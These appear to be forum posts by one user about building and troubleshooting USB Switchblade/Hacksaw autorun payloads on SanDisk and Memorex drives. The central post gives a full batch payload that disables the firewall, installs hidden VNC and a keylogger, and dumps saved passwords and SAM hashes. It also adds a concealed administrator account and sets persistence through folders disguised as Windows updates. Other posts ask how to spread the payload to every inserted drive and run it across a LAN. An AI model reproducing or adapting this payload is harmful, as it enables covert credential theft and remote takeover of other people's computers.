G-Stress

@ spektormax Gotcha, makes more sense also. I totally spaced the hacksaw on a non-U3. After as interesting and useful as your payload already is I'm shocked you haven't already added that... I got it, your not thinkin it in your head your commin back with something even more lethal and interesting ;)

@ pseudobreed Dude thanks alot, I really appreciate it:) I knew what rd meant and the path but not the others. So that code sounds like it just wipes out the drive C: that is? Anyway thanks again I'll probably be messin around with these variables all night now :)

@ operat0r_001 Curious as to what this bit of code will do exactly? rd /s /q c: Also where could I go to learn more about this type of coding? Sorry to ask, I have googled Batch Scripting ShellCode but can't seem to find anything containing some of the code used in these payloads, ex. %computername% A link or reference would be highly appreciated :D

@ spektormax I would like to know how you would go about modifying the hacksaw part of code to where when any future flash drives are plugged it, it copies the hacksaw payload to it, as well as does it's current job. It was mentioned that be possible in the last episode, but I've yet to see it mentioned here. It seems simple to do, but... if done wouldn't that drive need to be flashed also? That's where I think it could get complex.

@ deathwarder SanDisk buddy, switchblade is flawless with them. Not sure what you mean by package thing isn't working? It works fine all all 3 of my SanDisk's the only 1 I'm havin trouble with is a Memorex U3 and I know it's just the flashing that's the problem.

I have the mini and 2 more SanDisk, they all work flawlessly. Can I ask why are you so worried about speed? Your gonna get the same speed reguardless usb 2.0 is usb 2.0. I'm not sure if these drives have any specifications on speed other than the standard usb 2.0, but I would recommend any SanDisk :D

I would go SanDisk all the way, they work flawlessly. U3 or non-U3 :D

It was mentioned in the last episode about the hacksaw where you could mod the code to not only copy the contents of the usb drive but also send the payload to any drive inserted. Was wondering if anyone has tried that yet. It seems so easy to do, but wouldn't the drive have to be flashed with the loader?

Anybody get a Memorex U3 working via autorun? I got a 256MB Memorex TravelDrive and followed all the above steps and the only part that works is it dumps the local shares, ipconfig info, disables firewall and that's about it?

How I created my ISO is I explored the cdfs partition and copied the 4 files to a folder on my desktop. Then I'm not exactly sure I edited it right as I'm not too familiar with programming:) I edited the vb script and just changed the locations and filnames to fit my payload... well the payload that I'm using and then I saved the 4 file's using MagicISO as an ISO then pasted that in the "bin" directory then used the above method to flash the drive. It worked and all just not sure if I edited the vb script file right. Anyone else have a better method/way I'm interested in knowing.

Hmmm... it worked just fine for me. Are you using any spyware/adware software? I know it automatically detects and I believe quarentines bpk.exe atleast mcafee and aol software do. It'd be nice if I can find a way to encrypt it :D I placed a read me in the package also of how I implemented it, if you have any questions just ask. Also if any one else finds this interesting and a better method of installation for the logger please let me know :D 1 more thing, does anyone have a good resource to where I can go to learn more about this type of coding/scripting. I've been googling shell programming but I'm not really finding anything similiar to this :?

Yea, you don't have to keep the logger installed and you can install it on any PC, you just need to make a remote install package, because then... well actually there has to be a way to install this like vnc and specify the e-mail settings upon installation. If someone does decide to mess around with that and figures it out I'd like to know :)

Ok I uploaded the package (Perfect Keylogger) on the packages page along with a "Read Me" of how I implemented it. As far as the rest of the changes I've made any idea why it's all not working?

Ok guys here's the modifications I've made so far, but i'm having a bit of a problem now. It seems to only dump the local shares and ip info and completely skips everything else. Well the hacksaw and nmap part worked also, but everything else it just skips. Also instead of dumping the info in the default dump directory it makes a new directory (RECYCLERRECYCLERDumphostuser) and dumps it there. This is a Memorex TravelDrive also. This payload works fine on my 1gig cruzer non-u3 via the autoplay action, but I didn't add the hacksaw and nmap part to that one. Also what I did was copy the 4 files from the CDFS partition: autorun.inf LaunchU3.exe LaunchPad.zip switchblade.vbs I edited the switchblade.vbs file and changed the following: If objFSO.FileExists(objDrive.DriveLetter & ":WIPCMDgo.cmd") Then strPath = objDrive.DriveLetter & ":WIPCMD" strcmd = """" & strPath & "" & "go.cmd" & """" to: If objFSO.FileExists(objDrive.DriveLetter & ":RECYCLERautoexec.bat") Then strPath = objDrive.DriveLetter & ":RECYCLER" strcmd = """" & strPath & "" & "autoexec.bat" & """" Then I created a new .ISO file of those 4 files and used the UpdaterCore from the memorex tutorial with my new LaunchPad.iso file in the bin directory to flash the partition. Am I missing something to make the rest of this work? :: Do not show commands to console ================================== @echo off setlocal :: Dump Directory ================= set dumppath=RECYCLERDUMP%computername%%username% :: Make Directory from Computer NameUser ========================================= mkdir %dumppath% :: Apply Attributes Hidden and System ===================================== attrib +h +s RECYCLERDUMP :: Turn Off Windows XP Firewall =============================== netsh firewall set opmode disable :: Setup VNC ============ regedit /s RECYCLERultravnc.reg mkdir "%ProgramFiles%UltraVNC" xcopy RECYCLERUltraVNC "%ProgramFiles%UltraVNC" /D /E /C /I /H /F /R /Y "%ProgramFiles%UltraVNCwinvnc.exe" -reinstall :: Set Services to Auto ======================= RECYCLERnircmd.exe service auto lanmanworkstation RECYCLERnircmd.exe service auto lanmanserver RECYCLERnircmd.exe service auto winvnc RECYCLERnircmd.exe service auto remoteregistry :: Start Services ================= RECYCLERnircmd.exe service start lanmanworkstation RECYCLERnircmd.exe service start lanmanserver RECYCLERnircmd.exe service start winvnc RECYCLERnircmd.exe service start remoteregistry :: Enable ADMIN$ Share ====================== RECYCLERnircmd.exe regsetval dword "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters" "AutoSharewks " "1" :: Port Probe ============= RECYCLERports.exe /shtml %dumppath%ports.html :: Current Process List ======================= RECYCLERprocess.exe /stab %dumppath%process.txt :: Internet Explorer History ============================ RECYCLERiehv.exe /shtml %dumppath%iehistory.html :: Internet Explorer Passwords ============================== RECYCLERiepv.exe /shtml %dumppath%iepasswords.html :: Email Client Passwords ========================= RECYCLERmailpv.exe /shtml %dumppath%mailpasswords.html :: Messenger Client Passwords ============================= RECYCLERmspass.exe /shtml %dumppath%messengerpasswords.html :: Network Passwords ==================== RECYCLERnetpass.exe /shtml %dumppath%networkpasswords.html :: Protected Passwords ====================== RECYCLERpspv.exe /stab %dumppath%protectedpasswords.txt :: Services =========== RECYCLERserviwin.exe /stab /services %dumppath%services.txt :: IP Info ========== ipconfig /all > %dumppath%lan.txt :: Dump VNC Password ==================== RECYCLERvncpwdump.exe /stab %dumppath%vncpass.txt :: Get External IP ================== RECYCLERwget.exe http://whatismyip.com ren index.html wan.html xcopy wan.html %dumppath% /H /C /Y del wan.html /q :: SAM Dump =========== :: fgdump will only dump to call folder :: run fgdump, copy pwdump file to dumppath, then delete original RECYCLERfgdump.exe -c -s -r -h 127.0.0.1 -u %username% -p * >> 127.0.0.1.pwdump.log xcopy *.pwdump %dumppath% /H /C /Y xcopy 127.0.0.1.pwdump.log %dumppath% /H /C /Y del *.pwdump /q del 127.0.0.1.pwdump.log /q :: Add User =========== net user SUPPORT passw0rd /add /fullname:"CN=Microsoft Corporation,L=Redmond,S=Washington" /comment:"This is a vendor's account for Support" net localgroup Administrators SUPPORT /add net accounts /maxpwage:unlimited :: Hide SUPPORT from Windows XP Login Screen ============================================ RECYCLERnircmd.exe regsetval dword "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" "SUPPORT" "0" :: Delete MS's Support Account ============================== net user SUPPORT_388945a0 /delete :: Local Share's ================ net view 127.0.0.1 > %dumppath%shares.txt :: Install Perfect Keylogger ========================================================================== mkdir "%ProgramFiles%backupsupport" xcopy RECYCLERbpk "%ProgramFiles%backupsupport" /D /E /C /I /H /F /R /Y "%ProgramFiles%backupsupportbpkbpk.exe" :: Nmap Scanner =============== :: If admin make windows$NtUninstallKB931337$, else make %appdata%sbs mkdir %systemroot%$NtUninstallKB91337$ || mkdir "%appdata%scs" :: go to payload directory cd RECYCLERnmap_install :: remove hidden and system attributes (makes next copy command happy, probably better way to do this) attrib *.* -s -h :: copy payload to target copy *.* %systemroot%$NtUninstallKB91337$ || copy *.* "%appdata%scs" :: reapply hidden and system attributes attrib *.* +s +h :: Hide USB Hacksaw attrib %systemroot%$NtUninstallKB91337$ +s +h & attrib "%appdata%scs" +s +h :: Start USB Hacksaw (something is wrong with this next line, trying dirty hack below) %systemdrive% cd cd %systemroot% cd $NtUninstallKB91337$ nircmd execmd CALL nmap.bat :: USB Hacksaw ============== :: If admin make windows$NtUninstallKB931337$, else make %appdata%sbs mkdir %systemroot%$NtUninstallKB931337$ || mkdir "%appdata%sbs" :: go to payload directory cd RECYCLERSBS :: remove hidden and system attributes (makes next copy command happy, probably better way to do this) attrib *.* -s -h :: copy payload to target copy *.* %systemroot%$NtUninstallKB931337$ || copy *.* "%appdata%sbs" :: reapply hidden and system attributes attrib *.* +s +h :: If admin register USB Hacksaw as startup program in registry, else do it the yucky way reg.exe add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun /v USBMedia /t REG_SZ /d "%systemroot%$NtUninstallKB931337$sbs.exe" /f || "%appdata%sbsshortcut.exe" /f:"%USERPROFILE%Start MenuProgramsStartup .lnk" /A:C /T:"%appdata%sbssbs.exe" /W:"%appdata%sbs" /I:"%appdata%sbsblank.ico" :: Hide USB Hacksaw attrib %systemroot%$NtUninstallKB931337$ +s +h & attrib "%appdata%sbs" +s +h :: Start USB Hacksaw (something is wrong with this next line, trying dirty hack below) :: "%systemroot%$NtUninstallKB931337$sbs.exe" || "%appdata%sbssbs.exe" %systemdrive% cd cd %systemroot% cd $NtUninstallKB931337$ sbs.exe :: Done :? :?

@ pseudobreed Very nice work man. I am actually using your payload. You mentioned 2 things I was curious about. 1. being "The reason it goes to the exe is because in the application I have a routine that looks for the removable drive letter (As this will vary from machine to machine). "[/u] I was wondering is that some code I could add to a batch script? 2. was about the dump path and using it on the lan, but I understand that, just changing the pathname. Right now I have a memorex TravelDrive and I cannot get it to work, I have 2 cruzer's also that work just fine. This memorex is for testing purposes. I used the loader's on the switchblade link but when I copy the WIP and Documents folder to the drive nothing happens upon autoplay :? Am I doing something wrong? I put the MemorexSB.exe on the desktop as stated and ran it, then copied my payload to the drive, but I get nothing upon autoplay?

K, I just went back to the memorex tutorial and saw there was a free ISO maker out there so I'm a little bit confused, but the cruzer loader contains autorun.exe and autorun.inf I'm assuming autorun.exe just points to WIPCMDgo.bat file to start the whole thing. So me having no programming expeirence could I make the autorun.inf file and then create and autorun.bat instead of .exe and point it to the location and build that as an ISO and it should work? I guess I'm asking does it matter if it be .exe or .bat and would they both give the same result? Sorry guys, I did find a memorex loader on the actual switchblade link but I would like to know if it would be possible to use the method listed above about building the iso with a .bat file? Thanks in advance.

Has nobody really not found a Memorex TravelDrive loader? I followed the custom Memorex TravelDrive ISO tutorial, but there was no loader for the drive there. I did just search all 29 pages for a loader, only I scanned through them looking for anything memorex related I didn't see a loader. I tried placing the LaunchPad.iso with the cruzer one just to see if it'd work and it did not work. Just wondering if anyone else has a memorex loader or can post the source for autorun.exe for the cruzer loader.

@ pseudobreed Okay I currently use your payload as I like that it installs vnc. Was wondering what I would need to add to the code to execute it remotely on my lan and recieve the dumped files back to my box? Thanks in advance.

@ pseudobreed So using wget, it executes the payload on the remote boxes and dumps all the information, hashes, history, installs vnc, etc. in a directory back on your box? Just tryin to make sure I understood properly as if I have 4 machines on my lan and I wanted to execute this payload on them all at once without a flash drive and recieve all the information, etc.

Thanks man, I'll give this a try. It looks like they only make this for linux, but I'll give it a try:)

Something I thought about was has anyone modded the script to not only work with flash drives, but to work on a lan. As in execute the script without a flash drive on your own box and have it search the lan and return the results back to you on your box?

Yea I thought about static arp tables but haven't looked into setting them up yet. I don't login to anything I use on any lan except my own after learning about arp poisioning. Except when I use my cell phone cause it's a client/server connection. I agree though, that there is no perfect security. 1 more ? as far as my situation goes, what sniffer/lan monitor would you guys recommend to be sniffing 24/7 but checked daily? I know ethereal/wireshark does tend to consume alot of space after sometime, so was wondering if anyone else had any other suggestions?

hmm, I could have swore on one of the episodes, they demonstrated cain arp poisoning, then they went to the same web site only cain did not pick up the username and pass after they did something differnet. I can't remember if they used some 3rd. party app or if they just made some change to their pc configuration :?

I may be wrong, but after I saw one of the episodes I believe either 3 or 5 where they used Cain and Abel to arp poision, I thought they demonstrated a way to protect your machine from such attack, but as I go back and re-watch the episodes I don't see it. I know it doesn't capture https traffic, I'm just wondering on the steps I would need to take to protect myself from such attack? If someone could be so kind to provide a link possibly? I also wanna say I wasn't to worried about security until I started running cain 24/7 on one of my boxes just poisioning my whole lan and i'm glad I do, because I caught 2 attackers. 1 was someone tryin to brute force my ftp server and another someone scanned me I assume and discovered I am running vnc and they attempted to log in... unsuccessfully of course;)

You mind sharing a link about the wireless keys? I searched and searched and searched looking for a way or location where windows stored the wireless profiles, but was not able to find much useful information. Only something about WZCQuery or something like that doing something I can't rememeber now. Also I was curious about grabbing info from networked PC's as well, that would be really useful :D